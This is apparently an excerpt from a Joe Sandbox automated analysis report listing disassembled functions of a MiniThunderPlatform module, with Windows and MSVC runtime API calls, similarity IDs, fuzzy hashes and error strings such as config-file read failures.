                                                                                                                                              • ResetEvent.KERNEL32(00000000,?), ref: 10059201
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 1005920C
                                                                                                                                                • Part of subcall function 10173A00: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(0000000D,?,00000000,00000014,?,00000014,10173FFF,?,00000000,?,00000014,10058B6A,1005BF55,00000000,?,?), ref: 10173A25
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??$?CriticalD@1@@std@@D@2@@0@0@SectionV?$basic_string@$EnterEventLeaveReset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2077395254-0
                                                                                                                                              APIs
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 100A155C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,100A2CE8), ref: 100A158F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,100A2CE8), ref: 100A15A0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,100A2CE8), ref: 100A15B1
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2599707790-0
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,10248B71,000000FF), ref: 10081600
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 1008161C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,?,?,?,10248B71,000000FF), ref: 1008162A
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000002,?,?,?,?,?,?,?,?,?,?,?,?,10248B71,000000FF), ref: 10081643
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$CriticalDeleteSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1297904149-0
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCR71(?,00000000,00000208,?), ref: 100110F7
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?), ref: 10011101
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 10011114
                                                                                                                                              • wcscpy.MSVCR71(?,?,?,?,?), ref: 10011164
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Module$FileHandleNamememsetwcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2319185427-0
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,1024F13D,000000FF), ref: 100C1449
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,1024F13D,000000FF), ref: 100C147D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,1024F13D,000000FF), ref: 100C148B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,1024F13D,000000FF), ref: 100C1499
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1952106264-0
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                              • wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@ByteCharD@2@@std@@D@std@@MultiU?$char_traits@V?$allocator@Widememsetwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2795602572-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10044321
                                                                                                                                                • Part of subcall function 1004C3E0: RtlInitializeCriticalSection.NTDLL(?), ref: 1004C426
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,102426A0,000000FF), ref: 1004437A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,102426A0,000000FF), ref: 1004438A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,102426A0,000000FF), ref: 1004439A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CriticalH_prologInitializeSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3126932660-0
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,1024359F,000000FF,1003F6BB,?,?,00000000,102433B8,000000FF,1002F2F1,?,?), ref: 1004038D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,00000000,1024359F,000000FF,1003F6BB,?,?,00000000,102433B8,000000FF,1002F2F1,?,?,?), ref: 100403C5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100403D3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100403E0
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2484158455-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10024253
                                                                                                                                                • Part of subcall function 10023F17: RtlEnterCriticalSection.NTDLL(?), ref: 10023F26
                                                                                                                                                • Part of subcall function 1002B40C: __EH_prolog.LIBCMT ref: 1002B411
                                                                                                                                                • Part of subcall function 1002B40C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1002B427
                                                                                                                                                • Part of subcall function 1002B40C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(000000A1), ref: 1002B445
                                                                                                                                                • Part of subcall function 1002B0FA: __EH_prolog.LIBCMT ref: 1002B0FF
                                                                                                                                                • Part of subcall function 1002B0FA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,100240E7,name), ref: 1002B12C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,?), ref: 100242A0
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,7C3F18B8), ref: 100242B0
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100242BD
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog$??0?$basic_string@CriticalSectionV12@$??1?$basic_string@?assign@?$basic_string@?erase@?$basic_string@EnterLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1821285802-0
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 1005C2D3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005C2E6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C2FD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C30C
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@V01@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4131879318-0
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(10304E14), ref: 1013C2BB
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,1013C4AB), ref: 1013C2EA
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000000,?,?,1013C4AB), ref: 1013C30B
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(10304E14), ref: 1013C31C
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@CriticalSection$EnterLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2389133793-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C4216
                                                                                                                                                • Part of subcall function 100BCEA0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000,1024EB20,000000FF,1008A9DD,?,?,10073FBC), ref: 100BCED2
                                                                                                                                                • Part of subcall function 100BCEA0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000,1024EB20,000000FF,1008A9DD), ref: 100BCEE0
                                                                                                                                                • Part of subcall function 100BCEA0: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(102768F0,?,00000000,?,00000000,1024EB20,000000FF,1008A9DD), ref: 100BCEF7
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,1008F05B), ref: 100C4248
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,1008F05B), ref: 100C4258
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,1008F05B), ref: 100C4268
                                                                                                                                                • Part of subcall function 100C402E: __EH_prolog.LIBCMT ref: 100C4033
                                                                                                                                                • Part of subcall function 100C402E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(cmd_report_change_ex,?), ref: 100C404D
                                                                                                                                                • Part of subcall function 100C402E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Can't get setting instance!), ref: 100C406D
                                                                                                                                                • Part of subcall function 100C402E: _CxxThrowException.MSVCR71(-00000018,102CA7C4,-00000050), ref: 100C408B
                                                                                                                                                • Part of subcall function 100C402E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(max_url_length), ref: 100C4095
                                                                                                                                                • Part of subcall function 100C402E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(hub_agent), ref: 100C40AA
                                                                                                                                                • Part of subcall function 100C402E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(-00000034,-00000050,000000FF), ref: 100C40D5
                                                                                                                                                • Part of subcall function 100C402E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C40E2
                                                                                                                                                • Part of subcall function 100C402E: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-0000006C), ref: 100C4110
                                                                                                                                                • Part of subcall function 100C402E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C411D
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$??4?$basic_string@H_prologV01@$?assign@?$basic_string@ExceptionThrowV12@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3122126096-0
                                                                                                                                              • Opcode ID: 2d38da08aadeb5cd31bed133c338e19f270d5124666b3114bb5fa43f2f088a00
                                                                                                                                              • Instruction ID: de704546b656f870057d17345512e6a2ab41c393ade08adb06c534630588f478
                                                                                                                                              • Opcode Fuzzy Hash: 2d38da08aadeb5cd31bed133c338e19f270d5124666b3114bb5fa43f2f088a00
                                                                                                                                              • Instruction Fuzzy Hash: F2F08C389102A5DFE714CBA4C40CB9CBBB0FB28604F00808EF49693281CBF02604C7A2
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C4163
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C4182
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C4192
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C41A2
                                                                                                                                                • Part of subcall function 100C3D06: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,100C40F3), ref: 100C3D1D
                                                                                                                                                • Part of subcall function 100BCF20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,1024EB44,000000FF,1008A646), ref: 100BCF4E
                                                                                                                                                • Part of subcall function 100BCF20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,1024EB44,000000FF,1008A646), ref: 100BCF5C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??3@H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3597635974-0
                                                                                                                                              • Opcode ID: fa6e13655b19a80ac556172cc587f8195306cd523836ac35495d497c1480501b
                                                                                                                                              • Instruction ID: 76bb305c378cbcf419f8a1dcccdf2526ba41436f4debfb258e67e9b6248a8ae7
                                                                                                                                              • Opcode Fuzzy Hash: fa6e13655b19a80ac556172cc587f8195306cd523836ac35495d497c1480501b
                                                                                                                                              • Instruction Fuzzy Hash: 34F03C349106A5DAE724DBA4C55CB9DBBB4EB24604F10828EE45B53282CBB02608CB61
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(not utf-8), ref: 1002C301
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0), ref: 1002C323
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: not utf-8
                                                                                                                                              • API String ID: 113201077-4126474262
                                                                                                                                              • Opcode ID: 0b0849ec9032ad7d2ca08ac6d9c1031fd63a2922725a182efedb8fbd21986e86
                                                                                                                                              • Instruction ID: 368660a87cb1470bcb45f49940bba7c6ba8e7960a04fdf2c8f6dacdf5a86f6e4
                                                                                                                                              • Opcode Fuzzy Hash: 0b0849ec9032ad7d2ca08ac6d9c1031fd63a2922725a182efedb8fbd21986e86
                                                                                                                                              • Instruction Fuzzy Hash: 7231F9356087498FC314CF58E890B9AF3E5FF85754F848E1DE49543380D776AA09CB82
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100BD130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,?,?,?,?,1024EB59,000000FF,100BD3E3,?,?,?,1024EB59,000000FF,1008A7E2,?,?), ref: 100BD15F
                                                                                                                                                • Part of subcall function 100BD130: _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD185
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,?,?,?,1024EB59,000000FF,1008A7E2,?,?,?,?), ref: 100BD3F5
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD41B
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD3EC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ExceptionThrow$??0exception@@??1?$basic_string@
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 900035782-1936633475
                                                                                                                                              • Opcode ID: d33b37e6a91cf1b34611d3b7944843c4c8c6f0bfffd12ccdb8d1f2b31b77419b
                                                                                                                                              • Instruction ID: 6d73136c05deb39de3185fa15067abb0b69ae51a370060fb026e46ce6ac739e5
                                                                                                                                              • Opcode Fuzzy Hash: d33b37e6a91cf1b34611d3b7944843c4c8c6f0bfffd12ccdb8d1f2b31b77419b
                                                                                                                                              • Instruction Fuzzy Hash: 2D216A75A04200DFCB18DF28C980A5AF7E5FB98620F44892EFC5A97385E734EC04CB92
                                                                                                                                              APIs
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,00000000,00000001,?,00000001,?,?), ref: 100C15A8
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,00000000,00000001,?,00000001,?,?), ref: 100C1603
                                                                                                                                                • Part of subcall function 100C14C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100C15F3,?,00000001,?,?,1009224A,?,?,?,?), ref: 100C14EF
                                                                                                                                                • Part of subcall function 100C14C0: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100C150F
                                                                                                                                                • Part of subcall function 100C14C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 100C1536
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?find@?$basic_string@$??0?$basic_string@??1?$basic_string@?assign@?$basic_string@V12@V12@@
                                                                                                                                              • String ID: ?
                                                                                                                                              • API String ID: 3093974851-1684325040
                                                                                                                                              • Opcode ID: 7a5680610f2eab284a5fed8efe222b83cda5e617b4bd0f7286a76c4ff667fe13
                                                                                                                                              • Instruction ID: 8b72c374fccc4f010bd5b449e26bf678d51737e06fb71f8646da365a5379cf16
                                                                                                                                              • Opcode Fuzzy Hash: 7a5680610f2eab284a5fed8efe222b83cda5e617b4bd0f7286a76c4ff667fe13
                                                                                                                                              • Instruction Fuzzy Hash: 7C11E7353007109BD614CB64D884BAE73EAEFC9B10F10499DF146D7291CB70A849C761
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100BD130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,?,?,?,?,1024EB59,000000FF,100BD3E3,?,?,?,1024EB59,000000FF,1008A7E2,?,?), ref: 100BD15F
                                                                                                                                                • Part of subcall function 100BD130: _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD185
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!), ref: 100BD60F
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD635
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD606
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ExceptionThrow$??0exception@@??1?$basic_string@
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 900035782-1936633475
                                                                                                                                              • Opcode ID: f63a0858d9f63c92f5bbc876c5c6693d0b66f604c98fb3cd82b43cbc29b8747e
                                                                                                                                              • Instruction ID: b41e50b9aaccbe556a12fbf3cbfc92cdd55e207dd8fc2aad088f364bc7febfdf
                                                                                                                                              • Opcode Fuzzy Hash: f63a0858d9f63c92f5bbc876c5c6693d0b66f604c98fb3cd82b43cbc29b8747e
                                                                                                                                              • Instruction Fuzzy Hash: 83115B75504200EFCB08DF28C980A5AB7E9FB88724F44C92EF80A9B245D774E804CB61
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long), ref: 10015641
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71 ref: 10015667
                                                                                                                                                • Part of subcall function 10015545: __EH_prolog.LIBCMT ref: 1001554A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prologU?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 1391971735-1285458680
                                                                                                                                              • Opcode ID: a002f178a2b47248cd4da10a622b69cbd970e721b8f4628dfc60baf05d5b4970
                                                                                                                                              • Instruction ID: 9e9ae5254743f9710cc8d78efb0b636acd979b5f35ff6c31873d8ed071f55222
                                                                                                                                              • Opcode Fuzzy Hash: a002f178a2b47248cd4da10a622b69cbd970e721b8f4628dfc60baf05d5b4970
                                                                                                                                              • Instruction Fuzzy Hash: 39111375600244EFC711CF88C984AD9FBF4FB09355F498159E81AAF651D771ED50CBA0
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089313
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008933B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 100893A4
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 100893CC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 100893DC
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089404
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 10089414
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008943C
